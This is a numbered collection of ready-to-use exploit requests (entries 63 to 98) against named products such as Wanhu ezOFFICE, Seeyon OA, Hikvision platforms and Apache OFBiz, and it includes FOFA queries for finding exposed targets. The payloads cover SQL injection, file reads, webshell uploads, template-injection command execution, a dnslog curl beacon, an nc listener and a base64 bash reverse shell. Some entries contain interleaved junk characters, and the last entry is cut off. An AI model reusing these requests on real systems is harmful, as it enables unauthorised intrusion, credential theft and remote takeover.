User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Access:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

* |" Y0 a3 K3 O/ v3 f64. 捷诚管理信息系统CWSFinanceCommon SQL注入* A: P& ?' E7 V. g: I7 T
FOFA:body="/Scripts/EnjoyMsg.js"; F7 d6 K% H6 H3 y4 d9 Z: ~! J: D
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
- o' s* e: |" j4 fHost: 192.168.86.128:9001' |4 \% ?/ B1 ] A
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
% M0 [ C! e, y- @Connection: close
( ]: {& M& ]7 Q8 u9 N4 DContent-Length: 369. ^+ K3 N0 T1 s! |/ m! }/ m7 g
Accept: */*
+ p9 j" B; a3 e% W; UAccept-Language: en) T' w) Y/ r7 I% x" {
Content-Type: text/xml; charset=utf-8% k* h9 Z9 F, b+ b) m" p) Y, a6 _. q
Accept-Encoding: gzip
# R% W, I, Y$ E4 @( @. e
& o8 d2 x8 D+ A) q1 v: }<?xml version="1.0" encoding="utf-8"?>
$ y6 J2 P9 y9 M<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
; y; S6 Y) X( M+ `* [0 U3 \0 N<soap:Body>& J8 H$ ~( E, _* k8 L0 h
<GetOSpById xmlns="http://tempuri.org/">
' ?" n' h, K& T7 \3 s; u! r/ l; u <sId>1';waitfor delay '0:0:5'--+</sId>
( \2 T" D S% Z+ h: I3 ? </GetOSpById>
; r( c9 \. d' Q0 C </soap:Body>
0 g$ g9 F2 D) V: K</soap:Envelope>
( R/ I" ]7 F, Y) R( U2 @# i# A9 a7 n" d8 @1 Y% x# X6 Q( U5 I9 u
65. Youkate (优卡特) 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Lines 42 and 43 of the response containing the string 6cfe798ba8e5b85feb50164c59f4bec9 confirm that the vulnerability exists.
67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu (万户) ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu (万户) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

" w7 M) ~0 r( u3 U# V76. 新开普掌上校园服务管理平台service.action远程命令执行
+ L ~3 Y9 e1 I q4 aFOFA:title="掌上校园服务管理平台": R+ W7 F8 U( h1 j8 D) p( y
POST /service_transport/service.action HTTP/1.1: Q1 `% t* o/ ]- Y; b* L/ N
Host: x.x.x.x
% M X4 n# t( Y/ z) dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! ^2 A. w, G8 Q7 ]Connection: close/ L8 g7 n0 [# b2 v- f* b
Content-Length: 211
5 c4 I8 q3 [) m: ?4 x: U9 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) E4 H s$ _0 H$ K* k( M$ V5 ^
Accept-Encoding: gzip, deflate
9 p3 U, u3 b& [1 a5 Z6 R" O6 yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. k& S4 ^5 [& L, Q% Q
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
9 B3 d3 {9 l2 T( l; bUpgrade-Insecure-Requests: 1+ P" N$ p! H7 b
% l n5 s) ]& v6 J- v{
& x* u0 q: P t! u7 f"command": "GetFZinfo",
, }0 [) J. c5 k. G. [0 j1 w "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"( |% C, j9 W' u% D, L
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"& o$ U' b& L/ F3 \" i9 L0 W
}
' m8 N; [) ?& p! D
; J! z9 s+ O1 y* t/ |" n& D/ i
! H5 n4 L) ]4 GGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ d2 y7 P" S& s: M
Host: x.x.x.x
3 `: b2 o9 l- P0 |
+ J" n1 U) \2 @# _9 x% l: n% C
% R+ D# D. y+ e' H% y) W( b
77. F22 apparel management software system UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Suda Tianyao (速达天耀) software DesignReportSave.jsp interface arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password leak
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it injects a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD
Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QiAnXin (奇安信) Wangshen (网神) SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

Same sink as entry 93, reached through a different import handler. Fetch the uploaded file (the original text requested the filename from entry 93 here; it must be the name uploaded in this request):
GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA: app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
<params>
  <param>
    <value>
      <struct>
        <member>
          <name>test</name>
          <value>
            <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the serialized payload]</serializable>
          </value>
        </member>
      </struct>
    </value>
  </param>
</params>
</methodCall>

The request is unauthenticated: the USERNAME/PASSWORD/requirePasswordChange=Y parameters are what get it past the login check, and the <serializable> extension element is then deserialized by the XML-RPC handler, which is the deserialization sink. The method name is arbitrary.

Generate the payload with ysoserial (the ping is only a DNS-log beacon to confirm execution):
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated base64 for the placeholder in the POC above and send it:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD
96. Apache OFBiz < 18.12.11 groovy (ProgramExport) remote code execution
FOFA: app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

The same empty-credentials plus requirePasswordChange=Y trick as entry 95 reaches the ProgramExport screen without logging in; the screen evaluates groovyProgram as Groovy. Throwing the command output as an exception makes it appear in the error response.

Reverse shell
Start a listener on the attacking host (Kali in the original write-up):
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

Note: the base64 above decodes to bash%20-i%20>&%20/dev/tcp/192.168.40.128/7777%200>&1, i.e. with URL-encoded spaces, which bash will not interpret as spaces. Regenerate it from the plain string bash -i >& /dev/tcp/<listener-ip>/<port> 0>&1 before use.

97. OneBlog v2.2.2 Shiro deserialization remote command execution
FOFA: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

The rememberMe cookie is the classic Shiro-550 vector: a serialized gadget chain encrypted with the application's hard-coded rememberMe key. The PAYLOAD placeholder stands for that encrypted blob; the X-Token-Data header carries the command for gadget chains that read it.

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA: app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
